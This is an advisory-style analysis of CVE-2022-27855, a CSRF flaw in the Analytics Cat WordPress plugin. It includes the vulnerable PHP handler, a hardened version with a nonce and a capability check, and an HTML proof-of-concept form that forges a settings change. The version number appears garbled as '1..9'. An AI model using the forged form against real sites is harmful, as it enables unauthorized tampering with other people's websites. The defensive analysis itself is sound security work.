Cross-Site Request Forgery (CSRF) is a common web vulnerability that enables an attacker to perform unauthorized actions on a website on behalf of the targeted user. In this analysis, we will discuss CVE-2022-27855, a CSRF vulnerability discovered in the Fatcat Apps Analytics Cat plugin (version 1..9 and below) for WordPress websites. This vulnerability allows an attacker to change plugin settings without the user's consent. The following sections describe the vulnerability details, the code snippet responsible for the vulnerability, and links to the original references.

CVE-2022-27855: Vulnerability Description

The Analytics Cat plugin by Fatcat Apps enables website owners to add Google Analytics tracking code to their WordPress website. However, it was found that the plugin has a CSRF vulnerability (CVE-2022-27855) in versions 1..9 and below, allowing an attacker to change its configuration settings. An attacker could trick an authenticated WordPress administrator into clicking a crafted link or visiting a malicious website, leading to a potential leak of sensitive data or even complete control of the site.

Code Snippet: Exploitable Functionality

The CSRF vulnerability in the Analytics Cat plugin arises from the lack of proper security mechanisms such as nonce (CSRF token) verification on the settings update request. The vulnerable code has been identified in the save_options() function within the cat/includes/class-analytics-cat.php file:

// Vulnerable handler as shipped: it trusts any POST carrying an 'options' array.
public function save_options() {
    $options = isset( $_POST['options'] ) ? $_POST['options'] : false;

    if ( false === $options )
        return;

    // No nonce verification and no capability check happen before this point,
    // so a request forged by a third-party page is processed like a legitimate one.
    if ( ! isset( $options['manual_ua_code'] ) )
        $options['manual_ua_code'] = '';
    $options['manual_ua_code'] = sanitize_text_field( $options['manual_ua_code'] );
    update_option( 'analytics_cat', $options );
}

As we can see from the above code, the save_options() function does not include any nonce or CSRF tokens designed to secure the request when updating the plugin settings. This lack of proper security mechanisms leaves the plugin vulnerable to CSRF attacks.
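One way to close the gap is to emit a WordPress nonce with the settings form and verify it (together with the user's capability) before calling update_option(). The following is an added example, not the plugin's own fix; the class name Analytics_Cat_Settings, the nonce action 'analytics_cat_save_options' and the field name '_analytics_cat_nonce' are assumptions chosen for illustration.

```php
<?php
// Added example of a hardened save_options() (not code from the Analytics Cat plugin).
// Assumed names: class Analytics_Cat_Settings, nonce action 'analytics_cat_save_options',
// nonce field '_analytics_cat_nonce'.
class Analytics_Cat_Settings {

    // The settings form must carry the nonce so the browser sends it back.
    public function render_options_form() {
        echo '<form method="post">';
        // Emits a hidden '_analytics_cat_nonce' field plus a '_wp_http_referer' field.
        wp_nonce_field( 'analytics_cat_save_options', '_analytics_cat_nonce' );
        echo '<input type="text" name="options[manual_ua_code]" />';
        submit_button( 'Save' );
        echo '</form>';
    }

    // The handler refuses requests that lack a valid nonce or come from a user
    // without permission to manage options. A cross-site form cannot read the
    // nonce value, so a forged request dies before update_option() is reached.
    public function save_options() {
        $options = isset( $_POST['options'] ) ? $_POST['options'] : false;
        if ( false === $options ) {
            return;
        }

        // Capability check: only users who may manage options can change settings.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
        }

        // CSRF check: the nonce is bound to the user, the action and a time window;
        // check_admin_referer() calls wp_die() when it does not verify.
        check_admin_referer( 'analytics_cat_save_options', '_analytics_cat_nonce' );

        if ( ! isset( $options['manual_ua_code'] ) ) {
            $options['manual_ua_code'] = '';
        }
        $options['manual_ua_code'] = sanitize_text_field( $options['manual_ua_code'] );
        update_option( 'analytics_cat', $options );
    }
}
```

The nonce alone does not replace the capability check: nonces are tied to the current user, so a logged-in subscriber who obtains a valid nonce would still be stopped only by current_user_can().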

Exploit Details

An attacker could exploit this vulnerability by crafting a form that simulates a plugin settings change request. The form could then be hidden within a malicious website or delivered to the victim user through phishing or social engineering. Once the victim clicks on the malicious link, the attacker would be able to change the plugin settings without the user's knowledge.

An example of exploit code may look like this:

<html>
  <body>
    <form action="http://target.website.com/wp-admin/options-general.php?page=analytics_cat" method="POST">
      <input type="hidden" name="options[manual_ua_code]" value="hacked-UA-XXXXXXXX-X" />
      <input type="submit" value="Update Analytics Cat Settings" />
    </form>
  </body>
</html>

In the above exploit code, the crafted form sends a POST request to the analytics_cat plugin settings page with a hidden input field containing the attacker's modified Google Analytics UA code.

Original References

1. CVE Details - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27855
2. WPVulnDB - https://wpvulndb.com/vulnerabilities/12412

Conclusion

The CSRF vulnerability (CVE-2022-27855) in Fatcat Apps Analytics Cat plugin versions 1..9 and below on WordPress websites poses a significant security risk. Website owners and administrators should immediately update their plugin to the latest version or implement proper nonce and CSRF tokens to prevent unauthorized plugin settings changes. Maintaining a strong security posture includes regularly monitoring and updating plugins to address new vulnerabilities as they are discovered.

Timeline

Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 14:04:00 UTC